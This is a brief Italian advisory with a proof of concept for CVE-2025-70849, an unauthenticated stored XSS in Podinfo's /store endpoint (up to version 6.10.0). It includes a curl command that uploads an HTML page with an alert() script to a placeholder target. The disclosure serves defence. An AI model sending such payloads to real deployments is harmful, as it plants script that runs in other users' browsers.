
PoC e Advisory per CVE-2025-70849: XSS persistente non autenticato nell'endpoint /store di Podinfo.
È stata identificata una vulnerabilità di sicurezza (CWE-79) in Podinfo, un'applicazione web per la dimostrazione di microservizi Kubernetes. La funzionalità /store consente a utenti non autenticati di caricare contenuti HTML/JS arbitrari, portando a XSS persistente.
/store<= 6.10.0curl -X POST https://<target>/store -H "Content-Type: application/text" -d '<html><script>alert("CVE-2025-70849")</script></html>'
Kazi Sabbir | Shafayet Ahmed Alif